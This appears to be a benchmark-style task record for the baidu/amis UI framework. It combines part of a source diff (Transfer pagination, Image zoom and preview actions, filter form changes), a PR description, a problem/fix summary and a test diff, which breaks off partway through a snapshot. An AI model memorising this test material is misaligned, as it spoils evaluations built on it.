{pageDir: direction} : {}) + }); + + if (!formItem || !isAlive(formItem)) { + return; + } + + if (isPureVariable(source)) { + formItem.loadOptionsFromDataScope(source, ctx, onChange); + } else if (isEffectiveApi(source, ctx)) { + formItem.loadOptions(source, ctx, undefined, false, onChange, false); + } + } + @autobind optionItemRender(option: Option, states: ItemRenderStates) { const {menuTpl, render, data} = this.props; @@ -544,7 +591,11 @@ export class BaseTransferRenderer< showInvalidMatch, onlyChildren, mobileUI, - noResultsText + noResultsText, + pagination, + formItem, + env, + popOverContainer } = this.props; // 目前 LeftOptions 没有接口可以动态加载 @@ -570,6 +621,7 @@ export class BaseTransferRenderer< onlyChildren={onlyChildren} value={selectedOptions} options={options} + accumulatedOptions={formItem?.accumulatedOptions ?? []} disabled={disabled} onChange={this.handleChange} option2value={this.option2value} @@ -607,6 +659,28 @@ export class BaseTransferRenderer< showInvalidMatch={showInvalidMatch} mobileUI={mobileUI} noResultsText={noResultsText} + pagination={{ + ...pick(pagination, [ + 'className', + 'layout', + 'perPageAvailable', + 'popOverContainerSelector' + ]), + enable: + !!formItem?.enableSourcePagination && + (!selectMode || + selectMode === 'list' || + selectMode === 'table') && + options.length > 0, + maxButtons: Number.isInteger(pagination?.maxButtons) + ? pagination.maxButtons + : 5, + page: formItem?.sourcePageNum, + perPage: formItem?.sourcePerPageNum, + total: formItem?.sourceTotalNum, + popOverContainer: popOverContainer ?? 
env?.getModalContainer + }} + onPageChange={this.handlePageChange} /> <Spinner diff --git a/packages/amis/src/renderers/Image.tsx b/packages/amis/src/renderers/Image.tsx index c29071daa..feec4e7df 100644 --- a/packages/amis/src/renderers/Image.tsx +++ b/packages/amis/src/renderers/Image.tsx @@ -3,7 +3,13 @@ import { Renderer, RendererProps, CustomStyle, - setThemeClassName + setThemeClassName, + ActionObject, + IScopedContext, + ScopedContext, + createObject, + resolveVariableAndFilter, + isPureVariable } from 'amis-core'; import {filter} from 'amis-core'; import {themeable, ThemeProps} from 'amis-core'; @@ -398,6 +404,8 @@ export interface ImageFieldProps extends RendererProps { enlargeWithGallary?: boolean; showToolbar?: boolean; toolbarActions?: ImageAction[]; + maxScale?: number; + minScale?: number; onImageEnlarge?: ( info: { src: string; @@ -414,9 +422,21 @@ export interface ImageFieldProps extends RendererProps { target: any ) => void; imageGallaryClassName?: string; + onClick?: + | ((e: React.MouseEvent<any>, props: any) => void) + | string + | Function + | null; } -export class ImageField extends React.Component<ImageFieldProps, object> { +interface ImageFieldState { + scale: number; // 放大倍率 +} + +export class ImageField extends React.Component< + ImageFieldProps, + ImageFieldState +> { static defaultProps: Pick< ImageFieldProps, 'defaultImage' | 'thumbMode' | 'thumbRatio' @@ -426,6 +446,10 @@ export class ImageField extends React.Component<ImageFieldProps, object> { thumbRatio: '1:1' }; + state: ImageFieldState = { + scale: 1 + }; + @autobind handleEnlarge({ src, @@ -468,13 +492,73 @@ export class ImageField extends React.Component<ImageFieldProps, object> { } @autobind - handleClick(e: React.MouseEvent<HTMLElement>) { + async handleClick(e: React.MouseEvent<HTMLElement>) { + const {dispatchEvent, data} = this.props; const clickAction = this.props.clickAction; + const rendererEvent = await dispatchEvent( + e, + createObject(data, { + nativeEvent: e + }) + 
); + + if (rendererEvent?.prevented) { + return; + } if (clickAction) { handleAction(e, clickAction, this.props); } } + @autobind + handleMouseEnter(e: React.MouseEvent<any>) { + const {dispatchEvent, data} = this.props; + dispatchEvent(e, data); + } + + @autobind + handleMouseLeave(e: React.MouseEvent<any>) { + const {dispatchEvent, data} = this.props; + dispatchEvent(e, data); + } + + handleSelfAction(actionType: string, action: ActionObject) { + let {data, maxScale = 200, minScale = 50} = this.props; + let {scale = 50} = action.args; + if (actionType === 'zoom') { + if (isPureVariable(maxScale)) { + maxScale = isNaN( + resolveVariableAndFilter(maxScale, createObject(action.data, data)) + ) + ? 200 + : resolveVariableAndFilter(maxScale, createObject(action.data, data)); + } + if (isPureVariable(minScale)) { + minScale = isNaN( + resolveVariableAndFilter(minScale, createObject(action.data, data)) + ) + ? 50 + : resolveVariableAndFilter(minScale, createObject(action.data, data)); + } + + if (scale >= 0) { + this.setState({ + scale: + this.state.scale + scale / 100 < maxScale / 100 + ? this.state.scale + scale / 100 + : maxScale / 100 + }); + } else { + this.setState({ + scale: + this.state.scale + scale / 100 > minScale / 100 + ? this.state.scale + scale / 100 + : minScale / 100 + }); + } + } + } + render() { const { className, @@ -520,8 +604,10 @@ export class ImageField extends React.Component<ImageFieldProps, object> { className, setThemeClassName('wrapperCustomStyle', id, wrapperCustomStyle) )} - style={style} + style={{...style, transform: `scale(${this.state.scale})`}} onClick={this.handleClick} + onMouseEnter={this.handleMouseEnter} + onMouseLeave={this.handleMouseLeave} > {value || (!value && !placeholder) ? 
( <ThemedImageThumb @@ -597,4 +683,26 @@ export class ImageField extends React.Component<ImageFieldProps, object> { @Renderer({ type: 'image' }) -export class ImageFieldRenderer extends ImageField {} +export class ImageFieldRenderer extends ImageField { + static contextType = ScopedContext; + constructor(props: ImageFieldProps, context: IScopedContext) { + super(props); + + const scoped = context; + scoped.registerComponent(this); + } + + componentWillUnmount() { + const scoped = this.context as IScopedContext; + scoped.unRegisterComponent(this); + } + + doAction(action: ActionObject) { + const actionType = action?.actionType as string; + if (actionType === 'preview') { + this.handleEnlarge(this.props as ImageThumbProps); + } else { + this.handleSelfAction(actionType, action); + } + } +} diff --git a/packages/amis/src/renderers/QuickEdit.tsx b/packages/amis/src/renderers/QuickEdit.tsx index a49680a29..7a6481cc5 100644 --- a/packages/amis/src/renderers/QuickEdit.tsx +++ b/packages/amis/src/renderers/QuickEdit.tsx @@ -512,7 +512,7 @@ export const HocQuickEdit = > {render('quick-edit-form', this.buildSchema(), { value: undefined, - static: false, + defaultStatic: false, onSubmit: this.handleSubmit, onAction: this.handleAction, onChange: null, @@ -577,7 +577,8 @@ export const HocQuickEdit = mode: 'normal', value: value ?? 
'', onChange: this.handleFormItemChange, - ref: this.formItemRef + ref: this.formItemRef, + defaultStatic: false }); } @@ -591,7 +592,8 @@ export const HocQuickEdit = onChange: this.handleChange, formLazyChange: false, canAccessSuperData, - disabled + disabled, + defaultStatic: false }); } diff --git a/packages/amis/src/renderers/SwitchContainer.tsx b/packages/amis/src/renderers/SwitchContainer.tsx index 62d8f598a..7aad5492c 100644 --- a/packages/amis/src/renderers/SwitchContainer.tsx +++ b/packages/amis/src/renderers/SwitchContainer.tsx @@ -80,7 +80,7 @@ export default class SwitchContainer extends React.Component< componentDidUpdate(preProps: SwitchContainerProps) { const items = this.props.items || []; - if (this.state.activeIndex >= 0 && !items[this.state.activeIndex]) { + if (this.state.activeIndex > 0 && !items[this.state.activeIndex]) { this.setState({ activeIndex: 0 }); diff --git a/packages/amis/src/renderers/Table/AutoFilterForm.tsx b/packages/amis/src/renderers/Table/AutoFilterForm.tsx index d3d14f709..54aee11dd 100644 --- a/packages/amis/src/renderers/Table/AutoFilterForm.tsx +++ b/packages/amis/src/renderers/Table/AutoFilterForm.tsx @@ -71,7 +71,7 @@ export function AutoFilterForm({ }) ); - let showExpander = searchableColumns.length >= columnsNum; + let showExpander = activedSearchableColumns.length >= columnsNum; // todo 以后做动画 if (!searchFormExpanded && body.length) { @@ -100,7 +100,7 @@ export function AutoFilterForm({ } lastGroup.body.push({ type: 'container', - className: 'ButtonToolbar text-right block', + className: 'AutoFilterToolbar', wrapperBody: false, body: [ { @@ -114,32 +114,31 @@ export function AutoFilterForm({ visible: showBtnToolbar, buttons: searchableColumns.map(column => { return { - type: 'checkbox', - label: false, - className: cx('Table-searchableForm-checkbox'), - inputClassName: cx('Table-searchableForm-checkbox-inner'), - name: `${ - column.searchable.strategy === 'jsonql' ? '' : '__search_' - }${column.searchable?.name ?? 
column.name}`, - option: column.searchable?.label ?? column.label, - /** - * syncLocation开启后,参数值会从地址栏Query中二次同步到数据域中,其中布尔(boolean)类型的值被转化为字符串 - * eg: - * true ==> "true" - * false ==> "false" - * 所以这里将真值和假值转化成字符串格式规避 - */ - trueValue: '1', - falseValue: '0', - value: !!column.enableSearch ? '1' : '0', - badge: { - offset: [-10, 5], - visibleOn: `${ - column.toggable && !column.toggled && column.enableSearch - }` - }, - onChange: (value: '1' | '0') => - onItemToggleExpanded?.(column, value === '1' ? true : false) + children: ({render}: any) => + render( + `column-search-toggler-${column.id}`, + { + type: 'checkbox', + label: false, + className: cx('Table-searchableForm-checkbox'), + inputClassName: cx('Table-searchableForm-checkbox-inner'), + name: `__whatever_name`, + option: column.searchable?.label ?? column.label, + badge: { + offset: [-10, 5], + visibleOn: `${ + column.toggable && + !column.toggled && + column.enableSearch + }` + } + }, + { + value: activedSearchableColumns.includes(column), + onChange: (value: any) => + onItemToggleExpanded?.(column, value) + } + ) }; }) }, @@ -147,34 +146,35 @@ export function AutoFilterForm({ { type: 'submit', label: __('search'), + size: 'sm', level: 'primary', - className: 'w-18' + className: 'w-18 mr-2' }, { type: 'reset', label: __('reset'), + size: 'sm', className: 'w-18' }, - showExpander - ? { - children: () => ( - <a - className={cx( - 'Table-SFToggler', - searchFormExpanded ? 'is-expanded' : '' - )} - onClick={onToggleExpanded} - > - {__(searchFormExpanded ? 'collapse' : 'expand')} - <span className={cx('Table-SFToggler-arrow')}> - <Icon icon="right-arrow-bold" className="icon" /> - </span> - </a> - ) - } - : null - ].filter(item => item) + { + children: () => + showExpander ? ( + <a + className={cx( + 'Table-SFToggler', + searchFormExpanded ? 'is-expanded' : '' + )} + onClick={onToggleExpanded} + > + {__(searchFormExpanded ? 
'collapse' : 'expand')} + <span className={cx('Table-SFToggler-arrow')}> + <Icon icon="right-arrow-bold" className="icon" /> + </span> + </a> + ) : null + } + ] }); return { @@ -227,7 +227,7 @@ export default observer( const onItemToggleExpanded = React.useCallback( (column: IColumn, value: boolean) => { column.setEnableSearch(value); - store.setSearchFormExpanded(true); + value && store.setSearchFormExpanded(true); }, [] ); diff --git a/packages/amis/src/types.ts b/packages/amis/src/types.ts index 79a08921a..aec4a6775 100644 --- a/packages/amis/src/types.ts +++ b/packages/amis/src/types.ts @@ -115,7 +115,9 @@ export interface Action extends Button { | 'selectAll' | 'changeTabKey' | 'click' - | 'stopAutoRefresh'; + | 'stopAutoRefresh' + | 'preview' + | 'zoom'; api?: SchemaApi; asyncApi?: SchemaApi; payload?: any;
feat(amis-editor): InputTable配置面板补充属性 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 1b22ca7</samp> Added new options to the `table` control plugin schema in `Form/InputTable.tsx` to allow users to control the table layout and actions. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 1b22ca7</samp> > _To make tables more flexible and fun_ > _This pull request adds options, not one_ > _But three in the schema_ > _`showAddButton`, `className`, and `showOperationColumn`_ > _Now you can customize how they look and run_ ### Why <!-- author to complete --> ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 1b22ca7</samp> * Add switch options to toggle add buttons and operation column in table control plugin schema ([link](https://github.com/baidu/amis/pull/8629/files?diff=unified&w=0#diff-01999eae047ec7fdb8502c22801699d39f7a54c994a9414462c0fbe21634ecd8R1074-R1083)) * Add className option to customize toolbar element in table control plugin schema ([link](https://github.com/baidu/amis/pull/8629/files?diff=unified&w=0#diff-01999eae047ec7fdb8502c22801699d39f7a54c994a9414462c0fbe21634ecd8R1093-R1096))
**Title** Add pagination to Transfer, new Image actions/events, improve validation, UI tweaks and docs **Problem** - Transfer component had no pagination support, making large option sets unusable. - Image component lacked event emission and actions for preview/zoom, and scaling limits were missing. - Form validation performed strict shallow comparisons, causing unnecessary reloads and failing on loosely‑equal values. - Combo validation did not track validity of individual members, leading to incorrect error states. - Documentation for Transfer pagination and several component schemas was outdated. **Root Cause** - Transfer’s `FormItemStore` never stored pagination state nor sliced options; UI lacked pagination controls. - Image plugin did not define events/actions and the renderer did not handle them. - `isObjectShallowModified` only used strict equality, ignoring common loose‑equal cases. - `ComboStore` did not keep a map of each member’s validation result. - Docs and schema definitions did not reflect new pagination and image capabilities. **Fix / Expected Behavior** - Introduce `pagination` config in Transfer schema, load and slice options according to page/perPage, expose pagination UI and `onPageChange` callback. - Extend `FormItemStore` with pagination state (`enable`, `page`, `perPage`, `total`) and methods to update it when loading data. - Add Image events (`click`, `mouseenter`, `mouseleave`) and actions (`preview`, `zoom`) with UI controls for max/min scale. - Update `isObjectShallowModified` to accept a custom comparator, applying loose equality for specific value pairs. - Add `memberValidMap` to `ComboStore` and propagate member validity via `onValidChange` in Form, displaying error styling per combo item. - Refresh documentation (Transfer pagination, Image actions, UUID function) and adjust SCSS for Transfer footer, pagination, dropdowns, menus, tabs, combo, date picker, nested select, select, and other components. 
- Align editor plugins to expose new variable handling and event/action schemas. **Risk & Validation** - Pagination adds new request parameters; existing APIs may need to honor `page`/`perPage`. Verify backward compatibility with unchanged Transfer usage. - Modified shallow comparison could alter reload behavior; run the full test suite and manually test forms with numeric/string mixed values. - New UI styles may affect custom themes; review visual regression tests for affected components. - Ensure Image actions work in all contexts (static, form, table) and that combo validation correctly shows per‑item errors. - Validate documentation reflects the runtime behavior and that TypeScript typings remain accurate.
8,629
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index 32d23b1e5..151d84a7a 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -563,6 +563,18 @@ test('evalute:Math', () => { expect(evaluate('${POW(2, infinity)}', data)).toBe(data.infinity); }); +test('evalute:UUID', () => { + function isUUIDv4(value: string) { + return /^[0-9A-F]{8}-[0-9A-F]{4}-4[0-9A-F]{3}-[89AB][0-9A-F]{3}-[0-9A-F]{12}$/i.test( + value + ); + } + + expect(isUUIDv4(evaluate('${UUID()}', {}))).toBe(true); + expect(evaluate('${UUID()}', {}).length).toBe(36); + expect(evaluate('${UUID(8)}', {}).length).toBe(8); +}); + test('evalute:namespace', () => { localStorage.setItem('a', '1'); localStorage.setItem('b', '2'); diff --git a/packages/amis/__tests__/renderers/CRUD.test.tsx b/packages/amis/__tests__/renderers/CRUD.test.tsx index 043ea6389..1f5aae08c 100644 --- a/packages/amis/__tests__/renderers/CRUD.test.tsx +++ b/packages/amis/__tests__/renderers/CRUD.test.tsx @@ -20,6 +20,7 @@ * 17. api 返回格式支持取对象中的第一个数组 * 18. CRUD 事件 * 19. fetchInitData silent 静默请求 + * 20. CRUD表头查询字段更新后严格比较场景 */ import { @@ -1046,9 +1047,8 @@ test('17. should use the first array item in the response if provided', async () ) ); - waitFor(() => { - expect(container.querySelectorAll('tbody>tr').length).toBe(2); - }); + await wait(200); + expect(container.querySelectorAll('tbody>tr').length).toBe(2); }); describe('18. inner events', () => { @@ -1149,3 +1149,169 @@ test('19. fetchInitData silent true', async () => { expect(notify).toBeCalledTimes(1); }); }); + +test('20. 
CRUD filters contain fields that modification inspection should use strict mode', async () => { + let keyword; + const mockFetcher = jest.fn().mockImplementation((req) => { + /** mock.calls[0][0]拿不到filter里的参数,先用闭包测试吧 */ + keyword = req.data.version; + return Promise.resolve({ + data: { + status: 0, + msg: 'ok', + data: { + count: 0, + items: [] + } + } + }) + }); + const {container} = render( + amisRender( + { + type: 'page', + body: [ + { + "type": "crud", + "name": "crud", + "syncLocation": false, + "api": { + "method": "post", + "url": "/api/mock/crud" + }, + "filter": { + "body": [ + { + "type": "select", + "name": "version", + "label": "version", + "clearable": true, + "options": [ + {"label": "0", "value": 0}, + {"label": "1", "value": 1}, + {"label": "true", "value": true}, + {"label": "false", "value": false}, + {"label": "emptyString", "value": ''}, + {"label": "stringZero", "value": '0'}, + {"label": "stringOne", "value": '1'} + ] + } + ], + "actions": [ + { + "type": "submit", + "label": "SubmitBtn", + "primary": true + } + ] + }, + "columns": [ + { + "name": "id", + "label": "ID" + }, + { + "name": "version", + "label": "Engine version engine" + } + ], + } + ] + }, + {}, + makeEnv({fetcher: mockFetcher}) + ) + ); + + const select = container.querySelector('.cxd-Select')!; + const submitBtn = container.querySelector("button[type='submit']")!; + + fireEvent.click(select); + await wait(200); + let options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[0]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(0); + + /** 从 0 -> false 查询成功 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[3]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(false); + + /** 从 false -> '' 查询成功 */ + fireEvent.click(select); + await wait(200); + options = 
container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[4]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(''); + + /** 从 '' -> 0 查询成功 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[0]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(0); + + /** 切换到1 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[1]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(1); + + /** 从 1 -> true 查询成功 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[2]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(true); + + /** 从 true -> '1' 查询成功 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[6]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual('1'); + + /** 切换到false */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[3]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(false); + + /** 从 false -> '0' 查询成功 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[5]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual('0'); +}, 7000); diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/static.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/static.test.tsx.snap index 
59305c440..a67237dc5 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/static.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/static.test.tsx.snap @@ -119,7 +119,7 @@ exports[`Renderer:static 1`] = ` </div> `; -exports[`Renderer:static 2`] = ` +exports[`Renderer:static2 1`] = ` <div> <div class="cxd-Panel cxd-Panel--default cxd-Panel--form" diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap index 84cec19c7..820b37519 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap @@ -4022,1396 +4022,6 @@ exports[`Renderer:transfer table 1`] = ` </div> `; -exports[`Renderer:transfer table mode with virtual: result not virtual 1`] = ` -<div> - <div - class="cxd-Panel cxd-Panel--default cxd-Panel--form" - > - <div - class="cxd-Panel-heading" - > - <h3 - class="cxd-Panel-title" - > - <span - class="cxd-TplField" - > - <span> - 表单 - </span> - </span> - </h3> - </div> - <div - class="cxd-Panel-body" - > - <form - class="cxd-Form cxd-Form--normal" - novalidate="" - > - <input - style="display: none;" - type="submit" - /> - <div - class="cxd-Form-item cxd-Form-item--normal" - data-role="form-item" - > - <label - class="cxd-Form-label" - > - <span> - <span - class="cxd-TplField" - > - <span> - 分组 - </span> - </span> - </span> - </label> - <div - class="cxd-TransferControl cxd-Form-control" - > - <div - class="cxd-Transfer" - > - <div - class="cxd-Transfer-select" - > - <div - class="cxd-Transfer-title cxd-Transfer-title--light" - > - <span> - 可选项 - <span> - ( - 190 - / - 200 - ) - </span> - </span> - </div> - <div - class="cxd-TableSelection cxd-Transfer-selection" - > - <div - class="cxd-Table-content is-virtual" - > - <table - class="cxd-Table-table" - > - <thead> - <tr> - <th - class="cxd-Table-checkCell" - > - 
<label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--sm" - data-role="checkbox" - > - <input - checked="" - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </th> - <th> - 名称 - </th> - <th> - 值 - </th> - </tr> - </thead> - </table> - <div - class="cxd-Table-content-virtual" - > - <div - style="display: block; position: relative; width: 100%; height: 100%;" - > - <div - style="overflow: auto; will-change: transform; height: 0px; width: 100%;" - > - <table - class="cxd-Table-table" - style="margin-top: 0px;" - > - <colgroup> - <col - style="width: 0px;" - /> - <col - style="width: 0px;" - /> - <col - style="width: 0px;" - /> - </colgroup> - <tbody> - <tr - class="is-active" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - checked="" - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-1 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 1 - </span> - </td> - </tr> - <tr - class="" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-2 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 2 - </span> - </td> - </tr> - <tr - class="is-active" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - checked="" - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-3 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 3 
- </span> - </td> - </tr> - <tr - class="" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-4 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 4 - </span> - </td> - </tr> - <tr - class="is-active" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - checked="" - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-5 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 5 - </span> - </td> - </tr> - <tr - class="" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-6 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 6 - </span> - </td> - </tr> - <tr - class="is-active" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - checked="" - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-7 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 7 - </span> - </td> - </tr> - <tr - class="" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - 
> - <input - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-8 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 8 - </span> - </td> - </tr> - <tr - class="is-active" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - checked="" - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-9 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 9 - </span> - </td> - </tr> - <tr - class="" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-10 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 10 - </span> - </td> - </tr> - <tr - class="is-active" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - checked="" - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-11 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 11 - </span> - </td> - </tr> - </tbody> - </table> - <div - style="position: absolute; width: 1px; white-space: nowrap; min-height: 100%; height: 6400px; top: 0px; visibility: hidden;" - /> - </div> - <div - class="resize-sensor" - style="position: absolute; left: 0px; top: 0px; right: 0px; bottom: 0px; overflow: scroll; z-index: -1; visibility: hidden;" - > - - - <div - class="resize-sensor-expand" - style="position: absolute; left: 0; top: 0; 
right: 0; bottom: 0; overflow: scroll; z-index: -1; visibility: hidden;" - > - - - <div - style="position: absolute; left: 0px; top: 0px; width: 10px; height: 10px;" - /> - - - </div> - - - <div - class="resize-sensor-shrink" - style="position: absolute; left: 0; top: 0; right: 0; bottom: 0; overflow: scroll; z-index: -1; visibility: hidden;" - > - - - <div - style="position: absolute; left: 0; top: 0; width: 200%; height: 200%" - /> - - - </div> - - - <div - class="resize-sensor-appear" - style="position: absolute; left: 0; top: 0; right: 0; bottom: 0; overflow: scroll; z-index: -1; visibility: hidden;animation-name: apearSensor; animation-duration: 0.2s;" - /> - </div> - </div> - </div> - </div> - </div> - </div> - <div - class="cxd-Transfer-mid" - /> - <div - class="cxd-Transfer-result" - > - <div - class="cxd-Transfer-title cxd-Transfer-title--light" - > - <span> - 已选项 - <span> - ( - 10 - ) - </span> - </span> - <a - class="cxd-Transfer-clearAll" - > - 清空 - </a> - </div> - <div - class="cxd-Selections cxd-Transfer-value" - > - <div - class="cxd-Selections-items" - > - <div - class="cxd-Selections-item" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-1" - > - label-1 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="0" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-3" - > - label-3 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="1" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-5" - > - label-5 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="2" - > - <icon-mock - 
classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-7" - > - label-7 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="3" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-9" - > - label-9 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="4" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-11" - > - label-11 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="5" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-13" - > - label-13 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="6" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-15" - > - label-15 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="7" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-17" - > - label-17 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="8" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - 
